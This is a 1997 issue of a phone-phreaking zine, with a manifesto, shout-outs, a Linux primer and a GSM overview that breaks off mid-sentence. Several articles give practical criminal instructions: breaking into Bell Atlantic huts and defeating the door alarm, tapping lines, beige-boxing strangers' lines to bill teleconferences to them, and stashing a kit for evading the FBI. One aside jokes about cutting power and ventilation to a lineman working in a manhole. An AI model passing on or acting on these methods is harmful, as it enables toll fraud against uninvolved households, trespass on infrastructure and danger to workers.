Nation Phreaks Association Presents:
************************************
* __ _ _______ __ *
* /| \ /| | /| _____ | /| \ *
* | | \| | | | | |___/ | | | \ *
* | | |\ \ | | | | _____/ | | |\ \ *
* | | | \ \| | | | |___/ | | _ \ *
* | | |\ \ | | | | | | | \ \ *
* | |_| \ \__| | |_| | |_|\ \__\ *
* |/__/ \/__/ |/__/ |/__/ \/__/ *
************************************************
(AsciI art by KoSmoS)
A zine thats not full of shit
Opening Message From SKaLaR109 109(founder of NPA)
There are times when the seriousness of a certain situation may forgo you to
Become very hateful toward the world therefor causing you to have no care or
take no responsibilities for what you have done or do. This scenario is true in almost
all aspects of life. Perhaps you obtained your interest in the arts of H/P, by means of this
way.
Maybe not. The Government along with various monopolies, such as Bell (by the way
they claim not to be), Microsoft (speaks for itself), and Apple, (HAHA yeah fucking right)
wish to Feed us lies about the state of our world and countries today. These Lies have a
Name.
That name is Conventional Wisdom. Everyday we are Fed lies. Lies about who we are.
Lies about what we have achieved, About the past. History is written by those that conquer.
Those that conquer are not always those that we can trust. Although we may have marveled
at that great day in the 1960's when Man first Set Foot on A Hollywood Stage, and claimed
it to be one small step for man, We still have Hungry families and homeless that wish to be
considered mankind. Why do we ridicule those that are less fortunate. Why do we Fl0at
around
in a fucking Space station that doesn’t work while there are children that need to be fed and
mothers
that need medical attention. Why The fuck do we Put people like Mitnick in jail when there
are people
that have babies and kill them by shoving toilet paper in their mouth and only get 1 1/2 years
in jail
for it. Do you see what I am saying. While Telco sits back and charges a arm and leg for
services that
should be free another child dies from starvation. While The Government spends Millions of
dollars on
bullshit encryption programs and flying wonders, another man dies from the pneumonia
because he didn’t have
insurance so he couldn’t go to the hospital. WHY the FUCK Should I have to pay for higher
Education?
I Say Fuck The Assholes that sit back and Get Rich off of Meaningless shit. Are we not
entitled to education
or knowledge? Are we not entitled to talk to whom we want when we please? therefor I say
to you fellow
Hackers and Phreakers. Fuck the Government And Telc0. Obtain all you can and how you
can. If you Have the
Skillz to Then DO SO. You Must realize though that stupidity is not the key. The Key is
Knowledge. And if
you Carefully do what you do you will not be penalized. Leave the trace of a f00l and pay
the consequences.
Finally I say to you... READ and READ like you’ve never before. Do not Be afraid to spend
money on anything that
will be a source of Knowledge to you (in other words don’t steal Books). The authors
deserve the money.
In this Zine you will Find Useful information on how to survive in This World as a Hacker
And Phreak Please use this information Wisely.
My last words to you are Go and Learn for Knowledge is Power.
IMPORTANT NOTE!!! THIS ZINE HAS BEEN DIVIDED INTO A CERTAIN FORMAT... YOU WILL FIND BEGINERS FILES TOWARD
THE BEGINING OF THIS ZINE UNDER SECTION I. AND MORE TECHNICAL AND NON BEGINNER
ORIENTATED FILES TOWARD THE END UNDER SECTION II.
SKaLaR109/NPA 97
Opening Message From King Lazuras(Editor of NPA)
Hey, I'm King Lazuras, editor, were a little late on this. My fault
completely. Well, this should be a pretty good first issue. It doesn't
have a red box issue like most new zines do, which I am quite happy about.
Hell, you probably will actually learn from this. I have read many zines in
the past, and know most of them don't have more then 3 words of proper
English, and the rest is K-R4D 31337!!!! So, we decided that this is
going to be semi-correct. Not totally(after all, I am just some stupid
little phreak....) but I will try.
INDEX:
1. Shout Outs
a. From SKaLaR109 109
b. From Aardwolf
c. From King Lazuras
2. Writers/Editors/Other Important People List
**********************SECTION I*******************
(Beginner Files)
3. Articles
a. Bell Huts By Kosmos
b. Setting Up An Emergency Kit By Aardwolf
c. Linux: A Beginners Tutorial
Part 1: Basic Information By BurntToad
d. Conference Set-Up By Madk0w
e. Bell And Other Telco Trucks By Aardwolf
********************Section II****************
(AdvanCeD FilEZ)
a. THE IN'S AND OUT'S OF GSM Part1 by Master_y0da
b. EQUIBELL-ALT P DICTIONARY by KoSmoS
c. Advanced CGI Explotation... by IsolationX
d. Octel Systems by De-Format
e. My Unix Port Hand Book by Master_y0da
f. Using a Guest Lynx Account by Electric_Nectar
g. URL Of The Month by SKaLaR109
4. Closing Ceremonies
SHOUT OUTS
____________________________
From SKaLaR109 109:
I'd like to give a shout out to all the H/P community because
we are all equal, My Mommy , and Clarity who is the important lady in my life.
From Aardwolf:
NONE
From King Lazuras:
2600 (I have met most of the 2600 crowd, even)
(though they probably don't remember me.)
(Emanuel might 'cause I got him annoyed )
('cause I talk to fast...( I do...) )
Pam (she knows who she is, she rocks)
Wolfgame (he knows who he is to (and he drove me to dinner )
(a bunch of times after 2600 meetings) )
Iggy ('cause he was the first person)
(to actually remember me as Laz and not king)
(and he knows who he is to.)
My IRC Buddies--
IsolationX
delphian
ultram(he is gonna yell for me putting his name here)
de-format
--A LOT OF OTHER PEOPLE!!!!--
(To many people to list...Besides, not sure if anyone would )
(want to be associated with me. :) )
Writers/Editors/Other Important People List
___________________________________________________________
AdminIstration
1. SKaLaR109 109 -- The Cool Dude That Started NPA(Founder)
2. Aardwolf -- Cool Dude That Does Sooo Much, But Nothing Specific
3. King Lazuras -- Chief Editor(not such a cool dude, just me)
NPA/Writing Staff and a Damn Good one might I add
Collins
Hotwire
Madk0w
Hype
Sun_Fed_Darkness
X-Human
A_Clockwork_Orange
Master Yoda
Kosmos
TheViking
NivFreak
De-Format
BurntToad
IsolationX
Info234
Electric Nectar
Heyitsme
Technics
Krazy_Tunez
Kalony
Strykereye
Articles
_________________________
A.
BELL ATLANTIC HUTS
__________________
By
Kosmos
1997
INTRODUCTION
------------
Almost all of us have been in the situation were we say, is there not a
challenge. Well first your too cocky, and second, no. In my area of Bell we
have some thing we call a BELL HUT. A small building made of concrete with
the classic light and dark tan of bell Atlantic. In here you will find what
is in those, how not to be busted being in it, and what not to do in it.
HOW TO GET IN
-------------
Your classic brute forcing is always an option, yet you do not want to
leave all those scratches on the pretty bell place, so if you can kill a
bell man and get the key, or utilize that knowledge and lockpick it.
ONCE YOUR IN
------------
Getting in was your problem, now I am guessing you do not want a cop on you.
well look up in the upper left hand part of the doorway (on the frame). You
see that "thing". Well if you just opened the door it is sending signals to
the CO telling them that it is open. Not to worry though, cause you were
smart and read Kosmos' file. If you pull out the "knob" you will close off the
signal. (diagram later). You see when the door is closed it is pushed in
fully, closed(circuit), when you open it is half-way, open(circuit), when you
pull it is fully open, closed (circuit). Now your safe, from that anyway, you
still need to worry about noise, being obvious, etc...
WHAT TO DO NOW YOUR SAFE
------------------------
This hut is running a good full 10-20 blocks of houses, possibly more.
But do NOT touch a thing, unless having a couple thousand volts through you
sounds good. On one of the 2 long walls will be a grounder, a wrist band that
will ground you so you don't fry. Now what you do with the copper is your
problem, but you can splice, clip, and there is usually a phone on the wall.
Now I have also seen a Flat Box (a flat 2-3 foot tall, 1 foot wide, 3-4 in
thick box) just up on the wall, if you know what your doing in there, go for
it. (on a flat, when you open it there are 2 columns of pins, grouped in
4 pins, clip to the upper most right one, go over one, down on and clip there
to, bingo, dial-tone). Anyway there are also cabinets and god knows what is
in there, usually a couple manuals. If you can take your time and glance
around, I have know idea what you'll find near you.
THE KEY
-------
No sorry, not the key to the hut, the key of what to do when your in. At
the copper all you will see is rows and rows of black rectangles, either fold
them up or down, or open them like a cabinet, there are your wires^_^
WHAT NOT TO DO
--------------
I just wanted to accent on this because I do not want to read, Phreak
found Phried, in the newspaper. PLEASE DO NOT TOUCH A THING WITHOUT
BEING
GROUNDED!!!
TIPS
----
-Have a friend sit out front with his bike like he is taking a break so he can
notify you of a Telco truck coming, or something like that.
-Be paranoid, be very paranoid.
-Look, Listen, and Think. You may be very interested at finding something I
may have overlooked. You never know.
-Remember where you are and utilize that, everyone wants a conf. be kind^_^
DIAGRAM
------- _________
| | %=Conductor
/|_________|_________|_______ ^=On (circuit)
| _________ ____%____ _______| *=Off (circuit)
\| | * ^ * |
|________ |
B.
Setting Up An Emergency Kit
___________________________
By
Aardwolf
1997
Introduction:
-------------
Picture this: You were almost caught stealing car phones, you are out and
do not have a kit, the FEDS are at your house, or any other emergency.
What do you do? Well if you didn’t read this file you would probably last
about a week and finally get caught or die. Yet if you do read you will
be prepared and would last a long time. The following file will explain
the construction and setting up of an emergency kit.
How it works:
-------------
Basically its a backpack or something in the woods in a tree with a waterproof
cover on it that has stuff you need in it to survive. When something happens
and you need it you just go to that place in the woods and get it. Then you
have all the resources you put in it.
What you should have:
---------------------
-Money (doesn’t matter how much, $20 will last a long time if you know how to)
-Food (crackers or other things that are filling that do not go bad are great)
-Phield Phreaking Kit (For them calls)
-Change of underwear (I wonder why)
-Small wool blanket or something (it does get cold)
-Matches, Lighter
-Flashlight
-Toilette paper (or just steal it from your local 7-11's bathroom)
-NPA's file on loitering, surviving, and other cool shit
-Hat/beenie (20% of heat loss is through your head)
-Paper, Pen (Might need em)
-List of numbers, family members, loyars
-Anything you think you will need or you can fit in your backpack
Placing:
--------
You should put it in a place like the woods, and it should be close to
somewhere you can get to easily. Just do not forget where it is!
This thing might seem dumb but you will wish you had it when you are wanted
by the FBI.
C.
Linux: A Beginners Tutorial
Part 1: Basic Information
___________________________
By
BurntToad
1997
1) Basic Commands:
--------------
Learning Linux isn't easy but its power and
the many ways it can be customized makes it
worth the effort. If you think back to the
first time you saw DOS's C: prompt, and had
no idea what to do, you will feel that way
the first time you see the Linux prompt;
depending on the shell you are using the
prompt will either be a $, a % or some other
symbol like it, but the idea is the same.
At this prompt you can either start up a program,
manipulate files, or configure your system.
Figure 1.0
-------------------------------------------------------------------------
UNIX DOS Action
-------------------------------------------------------------------------
ls dir Displays information about files and directories.
cd cd Changes the current directory.
cp copy Copies files from one directory to another.
mv move Moves a file to another directory.
rm del Removes a file.
mkdir mkdir Creates a new directory.
rmdir rmdir Removes a directory.
man help Displays help for a requested command.
more more Displays a file pausing at the end of each screen.
cat type Displays the contents of a file.
grep ------ Displays the lines in a file that match a given pattern.
chmod attrib Sets permissions on files and directories.
chown ------ Change the ownership of the specified file(s).
df dir Displays the amount of free space on the disk.
wc ------ Provides count of words, or characters in a file.
Fig. 1.0 shows some of the more basic UNIX
commands. There are differences in the between
the DOS and UNIX versions of specific commands.
For the most part, UNIX commands have far more
switches (options) available that their DOS
relatives, and more are added as users demand
them. More importantly UNIX was designed from
the ground up as a multi-user network system,
so commands like chmod and chown are crucial
for security.
The commands in Fig. 1.0 will help you get
started but don't be surprised if you run into
difficulties. You'll find that some programs
do not appear to be doing anything and others
have a very strange command system with no menu
to help. The text editor vi is one; you might
expect to load it then just start typing, but it
doesn’t work that way. Instead, you have to press
the letter I for insert mode and then start typing.
When it comes to saving the file, UNIX programmers
like the more accurate term write, and they create
their interfaces accordingly. Manual pages might
be meant as help, but are usually far too detailed,
and just confuse the average user. Be careful when
you use the rm command because when you delete a
file it is gone forever, and can not be undeleted.
2) UNIX Does Windows:
-----------------
The X Windows System variously, called X Windows,
X Window, or just X, is the primary graphical interface
for UNIX, and can be activated by typing startx,
or xmd. Unlike Windows 95 or NT, X Windows separates
the base systems and the windowing system. The actual
objects you see on the X desktop, including everything
from icons to toolbars to menus, come from a program called
a window manager. Think of it this way: If you could completely
replace your Windows 95 desktop with a different system of
managing UI objects and windows designs, with only the
core OS components running underneath, you'd be closer
to the X Windows model.
The most popular window manager is called fvwm,
which is a stripped down model of twm, the powerful,
but memory hungry window manager that comes with
X11 proper. Other window managers include mwm
(the motif window manager), and olwm
(Sun Microsystems' Open Look Interface). X Windows
was designed around the three button mouse son its
a good idea to have one.
3) Installing And Configuring X Windows
Getting used to X isn't a problem, but getting
it up and running may be. Typically, you install
it from the CD-ROM or FTP site. In Red Hat 4.1
and Caldera OpenLinux Base, the installation is
more or less automatic. It's one thing, however
to copy a systems files onto your hard disk, and
yet another to make them work with your hardware.
That's where many would be Linux users give up.
Once you have it up and running, the next question
is what you can do with it. The is , quite simply
anything. True X, wont run Windows applications,
with an emulator like WINE that is now in the making,
but many of the more popular software is made into
a UNIX version, like Netscape Navigator, or Corel
WordPerfect UNIX, or even DOOM.
The combination of Linux and XFREE86 offers a rich,
powerful, and complex operating system with excellent
salability and constant new development. At first you
may find yourself back in windows more so than Linux,
and you may wonder why you used up a big chunk of
your hard disk for something you do not even use.
Eventually you will spend more and more time in
Linux. The fact is, together Linux and X, let
you build a system suited precisely to your needs
and to your network, with freely available development
tools at your disposal. You need a lot of time to learn
Linux well, but you'll find that the time was well spent.
XFREE86 is just a version of the MIT X Window System
and is a available for System V/386, 386BSD, and
other x86 UNIX implementations..X11R6 is just the
X Windows in UNIX.
Any questions can be emailed to:
BurntToad@hotmail.com
D.
Conference Set-Up
_________________
By
Madk0w
1997
In this is the first submission I've made to the NPA and I’ll be
talking about Meet-Me conferences and Dial-In Bridges, how to set them up,
and methods of billing (not that we pay of course).
The most popular and the most convenient conferences are of course the
AT&T Dial-In bridges. These are the conferences that most everyone is familiar
with. As I found out, I have more fun setting them up than actually calling
into them, but thats just me I guess.
First things first, to set up conference's you must Beige Box, or use a cotcot
I like to beige Box, because this is the most convenient way so we'll just stick
with that for now. Now I will not be explaining what a Beige is or how to make
one since there are probably more T-files on that box than any other. You can
even find them on your local PD board. But get your beige box and get ready to
field phreak.
This is just a suggestion but before you get out there and hook up I would
have the info and equipment you will need to set up the conference. You don't
need alot of shit. All you need is a Pen and a piece of paper, and maybe
something hard to write on. I recommend a pen over a pencil for obvious
reasons. It would not be cool to break your lead while on the phone with the
Meet-Me operator. On the piece of paper you should write the number of the
Tele-Conference service and either your local ANI or an 800. I will post all
the number's and other information you will need to know at the end of this
article.
OK, when you have all your equipment go hook up your beige to wherever you
beige from. Now the only time I beige it's never from the same location.
Since it's usually at different times of the night, I never know if the owner
of the phone line is home or not. So what I’ve found to work best is when
you're hooking up to your line make sure it has call waiting. The operator
will call you back after you set up the conference and having the owner of
the phone line pick up his phone could lead to some very uncomfortable moments!
You can find a line with call waiting by hitting *70 on every line until you
hear the three short dial tones. I hope everyone knows what I mean.
Anyway, call the ANI and write the number down because the operator will
ask you what number you're calling from, this is how they bill the number.
Next call the Tele-conference service and set up your meet-ME’s. The rest is
basically talking with the operator and bullshitting her (or BullSHit as
Visionary would say). I'm not gonna tell you what to say to her. I mean it
might take you a couple of try's before you know what to say and are
convincing enough, but I will tell you this, keep it short and simple.
As Dead Kat and I have found out, it's easier to just say: "I need six
conference's set for the 1st,2nd,3rd,etc.. of December... from 6pm to 2:00am
EST.. and I want to bill them to the number I'm calling from..." There's no
need to make one call for every conference. Oh, and I almost forgot, she will
ask you how many ports you want. What she means is how many lines in do you
want. You can have up to 20 ports, but I would not recommend this at all.
Twenty people on a conference tends to make it hard to talk to anyone. I would
say no more than ten, maybe 15 if you know a shit load of people will call, but
ten should do the trick.
As soon as you hang up with her, dial a number that you know will ring and
that will let you stay on for a few minutes. A good example is a VMB with a
long greet or maybe a number that just rings forever I use 1-800-777-8854
just because I don't like the people that work there. Stay on the line until
you hear the call waiting beep and just click over. When you answer, the op
will tell you the pin's and numbers for the conferences.
Just work with what you have, you probably will have your own style and what
not, but let me mention this, the op will give you a "Host PIN". This is
for the person who set it up and no one else. Just some advice, don't call
the conference direct and use this code. You'll end up paying for the meet-me.
Well it's easy. All you need is a beige box, a place to beige, and the 800
number. Here are the numbers for the ATT conference's. These numbers are
basically the same, you can call either one and set them up.
1-800-232-1111 -AT&T Conference Set-up
1-800-544-6363 -AT&T Conference Set-up
0-700-456-1000 -AT&T's Alliance Teleconferencing
0-700-456-2000 -AT&T's Alliance Teleconferencing
1-800-544-6363 -AT&T's Alliance Teleconferencing
1-800-366-2663 -Sprint Teleconference
1-800-487-9240 -ANI
1-800-444-4444 -press 1 and wait for ANI
Next issue of NPA I’ll tell you how to set up a conference using
Worldvox.
And I thought I’d give you a little bit of info...
I called AT&T Conference Set-up # and the price per minute is about
.55 cents a minute per line plus a 15.00 setup fee, so after the conference
add up the approx. amount of people that were on and how long the conference
was up for and find out how much of a bill it is. I'm sure the people who's
house you beige from won't be happy when they get there $1000+ bill. Heh!
E.
Bell and other Telco Trucks
___________________________
By
Aardwolf
1997
Introduction:
-------------
Telco trucks. We all know and love them... As we all know they come in many
flavors and colors but who really really understands them? What is in them?
What is their gas mailing. And how the hell do they drive them pieces of shit.
The above questions may or may not be answered in this file so do not blink
and eat your corn.
Telco Van:
----------
Dodge Ram 2500. Comes in white, gray, and green and gray (1970's)
Used by a wide variety of bell guys (Install, Repair, Splices)
Contain common equipment including shovels and manuals.
Have yellow flashy light on roof. Very common.
Telco Car:
----------
Gray and white. Have simple equipment (test set and some tools)
Used by CO-Tech and Engineers. May make home visits but mainly
for business use. Does not have yellow flashy light on roof.
Not very common. Usually found around CO’s and sometimes truck yards.
Telco Truck:
------------
White or gray. Used by some of the other bell guys. Usually emergency
vehicles for if a cable is cut or digging. May or may not have test set
depending on area. Manuals and maps. And picks, ax’s, and shovels.
Good amount of em but not as common as vans. Do have yellow flashy thingy.
Telco Bucket Truck
------------------
Very cool trucks. Just about as common as normal trucks depending on the
area. These suckers have a crane with a large bucket in em. They have
common equipment (testset, shovels, etc....) Bell uses these suckers for
working on Arial lines. Only the true linemen use these, Not the install
and repair or other guys. These guys have been with Telco for a while and
know what they are doing. They are usually white or gray like normal trucks.
They do have a flashy yellow thingy, and alot of equipment like road cones,
umbrellas, and lots of Arial cable and shit.
Telco Armored Trucks:
---------------------
These trucks are funky looking. They look like a banks armored car but are
bells. I have only seen white ones. Whey have front windows and thats it. They
are shaped like a hi-tech ambulance. They carry ladders and have a yellow
flashy thingy. They have the common equipment, along with digging tools like
mad! They have cabinets on the sides (locked :() which have tools up the
bunghole. They also can be used as mobile bell bases. These are very
uncommon and are mostly by bell huts or manholes. If you see one put that
sledge hammer to use. :)
Telco Trailer:
--------------
This is a trailer that hooks on to the back of Telco trucks and vans. They
use these when they go in manholes. They are used to provide the lineman
inside with power, light, and flier out the methane gasses. They are only
found when bell's in the manholes. Wouldn’t it be fun to turn it off while a
lineman is in the vault? hehehe....
*********************Section II**********************
A.
THE IN'S AND OUT'S OF GSM Part 1
by (\/)@ster Y0d@
mastyoda@concentric.net
During the early 1980s, analog cellular telephone systems were experiencing rapid growth in Europe,
particularly in Scandinavia and the United Kingdom, but also in France and Germany. Each country
developed its own system, which was incompatible with everyone else's in equipment and operation.
This was an undesirable situation, because not only was the mobile equipment limited to operation
within national boundaries, which in a unified Europe were increasingly unimportant, but there was a
very limited market for each type of equipment, so economies of scale, and the subsequent savings,
could not be realized.
The Europeans realized this early on, and in 1982 the Conference of European Posts and Telegraphs
(CEPT) formed a study group called the Groupe Sp‚cial Mobile (GSM) to study and develop a
pan-European public land mobile system. The proposed system had to meet certain criteria:
good subjective speech quality,
low terminal and service cost,
support for international roaming,
ability to support handhald terminals,
support for range of new services and facilities,
spectral efficiency, and
ISDN compatibility.
In 1989, GSM responsibility was transferred to the European Telecommunication Standards Institute
(ETSI), and phase I of the GSM specifications were published in 1990. Commercial service was
started in mid-1991, and by 1993 there were 36 GSM networks in 22 countries, with 25 additional
countries having already selected or considering GSM [DS93]. This is not only a European
standard - South Africa, Australia, and many Middle and Far East countries have chosen GSM. By
the beginning of 1994, there were 1.3 million subscribers worldwide [Nil]. The acronym GSM now
(aptly) stands for Global System for Mobile telecommunications.
The developers of GSM chose an unproven (at the time) digital system, as opposed to the
then-standard analog cellular systems like AMPS in the United States and TACS in the United
Kingdom. They had faith that advancements in compression algorithms and digital signal processors
would allow the fulfillment of the original criteria and the continual improvement of the system in terms
of quality and cost. The 8000 pages of the GSM recommendations try to allow flexibility and
competitive innovation among suppliers, but provide enough guidelines to guarantee the proper
interworking between the components of the system. This is done in part by providing descriptions
of the interfaces and functions of each of the functional entities defined in the system.
2 Services provided by GSM
References: [Har93a, Har93b, DS93, FR93, LM92, Hub92]
>From the beginning, the planners of GSM wanted ISDN compatibility in services offered and control
signalling used. The radio link imposed some limitations, however, since the standard ISDN bit rate
of 64 kbps could not be practically achieved.
Using the ITU-T definitions, telecommunication services can be divided into bearer services,
teleservices, and supplementary services. The digital nature of GSM allows data, both synchronous
and asynchronous, to be transported as a bearer service to or from an ISDN terminal. Data can use
either the transparent service, which has a fixed delay but no guarantee of data integrity, or a
non-transparent service, which guarantees data integrity through an Automatic Repeat Request
(ARQ) mechanism, but with a variable delay. The data rates supported by GSM are 300 bps, 600
bps, 1200 bps, 2400 bps, and 9600 bps [Har93a].
The most basic teleservice supported by GSM is telephony. There is an emergency service, where
the nearest emergency-service provider is notified by dialling three digits (similar to 911). Group 3
fax, an analog method described in ITU-T recommendation T.30 [Har93b], is also supported by use
of an appropriate fax adaptor. A unique feature of GSM compared to older analog systems is the
Short Message Service (SMS). SMS is a bidirectional service for sending short alphanumeric (up to
160 bytes) messages in a store-and-forward fashion. For point-to-point SMS, a message can be
sent to another subscriber to the service, and an acknowledgement of receipt is provided to the
sender. SMS can also be used in a cell-broadcast mode, for sending messages such as traffic
updates or news updates. Messages can be stored in the SIM card for later retrieval [Bal93].
Supplementary services are provided on top of teleservices or bearer services, and include features
such as caller identification, call forwarding, call waiting, multi-party conversations, and barring of
outgoing (international) calls, among others.
3 Architecture of the GSM network
References: [DS93, FR93, B+93, LM92, Hub92, Rah93, SK93]
A GSM network is composed of several functional entities, whose functions and interfaces are
defined. Figure 1 shows the layout of a generic GSM network. The GSM network can be divided
into three broad parts. The Mobile Station is carried by the subscriber, the Base Station Subsystem
controls the radio link with the Mobile Station. The Network Subsystem, the main part of which is
the Mobile services Switching Center, performs the switching of calls between the mobile and other
fixed or mobile network users, as well as management of mobile services, such as authentication.
Not shown is the Operations and Maintenance center, which oversees the proper operation and
setup of the network. The Mobile Station and the Base Station Subsystem communicate across the
Um interface, also known as the air interface or radio link. The Base Station Subsystem
communicates with the Mobile service Switching Center across the A interface.
3.1 Mobile Station
The mobile station (MS) consists of the physical equipment, such as the radio transceiver, display and
digital signal processors, and a smart card called the Subscriber Identity Module (SIM). The SIM
provides personal mobility, so that the user can have access to all subscribed services irrespective of
both the location of the terminal and the use of a specific terminal. By inserting the SIM card into
another GSM cellular phone, the user is able to receive calls at that phone, make calls from that
phone, or receive other subscribed services.
The mobile equipment is uniquely identified by the International Mobile Equipment Identity (IMEI).
The SIM card contains the International Mobile Subscriber Identity (IMSI), identifying the
subscriber, a secret key for authentication, and other user information. The IMEI and the IMSI are
independent, thereby providing personal mobility. The SIM card may be protected against
unauthorized use by a password or personal identity number.
3.2 Base Station Subsystem
The Base Station Subsystem is composed of two parts, the Base Transceiver Station (BTS) and the
Base Station Controller (BSC). These communicate across the specified A-bis interface, allowing
(as in the rest of the system) operation between components made by different suppliers.
The Base Transceiver Station houses the radio tranceivers that define a cell and handles the radio-link
protocols with the Mobile Station. In a large urban area, there will potentially be a large number of
BTSs deployed. The requirements for a BTS are ruggedness, reliability, portability, and minimum
cost.
The Base Station Controller manages the radio resources for one or more BTSs. It handles
radio-channel setup, frequency hopping, and handovers, as described below. The BSC is the
connection between the mobile and the Mobile service Switching Center (MSC). The BSC also
translates the 13 kbps voice channel used over the radio link to the standard 64 kbps channel used
by the Public Switched Telephone Network or ISDN.
3.3 Network Subsystem
The central component of the Network Subsystem is the Mobile services Switching Center (MSC).
It acts like a normal switching node of the PSTN or ISDN, and in addition provides all the
functionality needed to handle a mobile subscriber, such as registration, authentication, location
updating, handovers, and call routing to a roaming subscriber. These services are provided in
conjuction with several functional entities, which together form the Network Subsystem. The MSC
provides the connection to the public fixed network (PSTN or ISDN), and signalling between
functional entities uses the ITU-T Signalling System Number 7 (SS7), used in ISDN and widely used
in current public networks.
The Home Location Register (HLR) and Visitor Location Register (VLR), together with the MSC,
provide the call-routing and (possibly international) roaming capabilities of GSM. The HLR contains
all the administrative information of each subscriber registered in the corresponding GSM network,
along with the current location of the mobile. The current location of the mobile is in the form of a
Mobile Station Roaming Number (MSRN) which is a regular ISDN number used to route a call to
the MSC where the mobile is currently located. There is logically one HLR per GSM network,
although it may be implemented as a distributed database.
The Visitor Location Register contains selected administrative information from the HLR, necessary
for call control and provision of the subscribed services, for each mobile currently located in the
geographical area controlled by the VLR. Although each functional entity can be implemented as an
independent unit, most manufacturers of switching equipment implement one VLR together with one
MSC, so that the geographical area controlled by the MSC corresponds to that controlled by the
VLR, simplifying the signalling required. Note that the MSC contains no information about particular
mobile stations - this information is stored in the location registers.
The other two registers are used for authentication and security purposes. The Equipment Identity
Register (EIR) is a database that contains a list of all valid mobile equipment on the network, where
each mobile station is identified by its International Mobile Equipment Identity (IMEI). An IMEI is
marked as invalid if it has been reported stolen or is not type approved. The Authentication Center
is a protected database that stores a copy of the secret key stored in each subscriber's SIM card,
which is used for authentication and ciphering of the radio channel.
4 Radio link aspects
References: [Che91, Bal91, Bal93, Rah93, Wat93]
The International Telecommunication Union (ITU), which manages the international allocation of
radio spectrum (among other functions) allocated the bands 890-915 MHz for the uplink (mobile
station to base station) and 935-960 MHz for the downlink (base station to mobile station) for
mobile networks in Europe. Since this range was already being used in the early 1980s by the
analog systems of the day, the CEPT had the foresight to reserve the top 10 MHz of each band for
the GSM network that was still being developed. Eventually, GSM will be allocated the entire 2x25
MHz bandwidth.
Since radio spectrum is a limited resource shared by all users, a method must be devised to divide up
the bandwidth among as many users as possible. The method chosen by GSM is a combination of
Time- and Frequency-Division Multiple Access (TDMA/FDMA). The FDMA part involves the
division by frequency of the total 25 MHz bandwidth into 124 carrier frequencies of 200 kHz
bandwidth. One or more carrier frequencies are then assigned to each base station. Each of these
carrier frequencies is then divided in time, using a TDMA scheme, into eight time slots. One time
slot is used for transmission by the mobile and one for reception. They are separated in time so that
the mobile unit does not receive and transmit at the same time, a fact that simplifies the electronics.
In the rest of this section, the procedure involved in digitally transmitting a voice signal in a GSM
network is examined, along with some of the features, such as discontinuous transmission and
reception, used to improve voice quality, reduce the mobile unit's power consumption, and increase
the overall capacity of the network.
4.1 Channel structure
The structure of the most common time-slot burst is shown in Figure 2. A total of 156.25 bits is
transmitted in 0.577 milliseconds, giving a gross bit rate of 270.833 kbps. There are three other
types of burst structure for frame and carrier synchronization and frequency correction. The 26-bit
training sequence is used for equalization, as described below. The 8.25 bit guard time allows for
some propagation time delay in the arrival of bursts.
Each group of eight time slots is called a TDMA frame, which is transmitted every 4.615 ms.
TDMA frames are further grouped into multiframes to carry control signals. There are two types of
multiframe, containing 26 or 51 TDMA frames. The 26-frame multiframe contains 24 Traffic
Channels (TCH) and two Slow Associated Control Channels (SACCH) which supervise each call in
progress. The SACCH in frame 12 contains eight channels, one for each of the eight connections
carried by the TCHs. The SACCH in frame 25 is not currently used, but will carry eight additional
SACCH channels when half-rate traffic is implemented. A Fast Associated Control Channel
(FACCH) works by stealing slots from a traffic channel to transmit power control and
handover-signalling messages. The channel stealing is done by setting one of the control bits in the
time slot burst.
In addition to the Associated Control Channels, there are several other control channels which
(except for the Stand-alone Dedicated Control Channel) are implemented in time slot 0 of specified
TDMA frames in a 51-frame multiframe, implemented on a non-hopping carrier frequency in each
cell. The control channels include:
Broadcast Control Channel (BCCH): Continually broadcasts, on the downlink, information
including base station identity, frequency allocations, and frequency-hopping sequences.
Stand-alone Dedicated Control Channel (SDCCH): Used for registration, authentication, call
setup, and location updating. Implemented on a time slot, together with its SACCH, selected
by the system operator.
Common Control Channel (CCCH): Comprised of three control channels used during call
origination and call paging.
Random Access Channel (RACH): A slotted Aloha channel to request access to the
network
Paging Channel (PCH): Used to alert the mobile station of incoming call.
Access Grant Channel (AGCH): Used to allocate an SDCCH to a mobile for signalling,
following a request on the RACH.
4.2 Speech coding
References: [NHdB89, V+89, S+89]
GSM is a digital system, so speech signals, inherently analog, have to be digitized. The method
employed by ISDN, and by current telephone systems for multiplexing voice lines over high speed
trunks and optical fiber lines, is Pulse Coded Modulation (PCM). The output stream from PCM is
64 kbps, too high a rate to be feasible over a radio link. The 64 kbps signal contains much
redundancy, although it is simple to implement. The GSM group studied several voice coding
algorithms on the basis of subjective speech quality and complexity (which is related to cost,
processing delay, and power consumption once implemented) before arriving at the choice of a
Regular Pulse Excited - Linear Predictive Coder (RPE-LPC) with a Long Term Predictor loop.
Basically, information from previous samples, which does not change very quickly, is used to predict
the current sample. The coefficients of the linear combination of the previous samples, plus an
encoded form of the residual, the difference between the predicted and actual sample, represent the
signal. Speech is divided into 20 millisecond samples, each of which is encoded as 260 bits, giving a
total bit rate of 13 kbps.
4.3 Channel coding and modulation
Due to natural or man-made electromagnetic interference, the encoded speech or data transmitted
over the radio interface must be protected as much as is practical. The GSM system uses
convolutional encoding and block interleaving to achieve this protection. The exact algorithms used
differ for speech and for different data rates. The method used for speech blocks will be described
below.
Recall that the speech codec produces a 260 bit block for every 20 ms speech sample. From
subjective testing, it was found that some bits of this block were more important for perceived speech
quality than others. The bits are thus divided into three classes:
Class Ia 50 bits - most sensitive to bit errors
Class Ib 132 bits - moderately sensitive to bit errors
Class II 78 bits - least sensitive to bit errors
Class Ia bits have a 3 bit Cyclic Redundancy Code added for error detection. If an error is
detected, the frame is judged too damaged to be comprehensible and it is discarded. It is replaced
by a slightly attenuated version of the previous correctly received frame. These 53 bits, together
with the 132 Class Ib bits and a 4 bit tail sequence (a total of 189 bits), are input into a 1/2 rate
convolutional encoder of constraint length 4. Each input bit is encoded as two output bits, based on
a combination of the previous 4 input bits. The convolutional encoder thus outputs 378 bits, to
which are added the 78 remaining Class II bits, which are unprotected. Thus every 20 ms speech
sample is encoded as 456 bits, giving a bit rate of 22.8 kbps.
To further protect against the burst errors common to the radio interface, each sample is diagonally
interleaved. The 456 bits output by the convolutional encoder are divided into 8 blocks of 57 bits,
and these blocks are transmitted in eight consecutive time-slot bursts. Since each time-slot burst can
carry two 57 bit blocks, each burst carries traffic from two different speech samples.
Recall that each time-slot burst is transmitted at a gross bit rate of 270.833 kbps. This digital signal
is modulated onto the analog carrier frequency, which has a bandwidth of 200 kHz, using
Gaussian-filtered Minimum Shift Keying (GMSK). GMSK was selected over other modulation
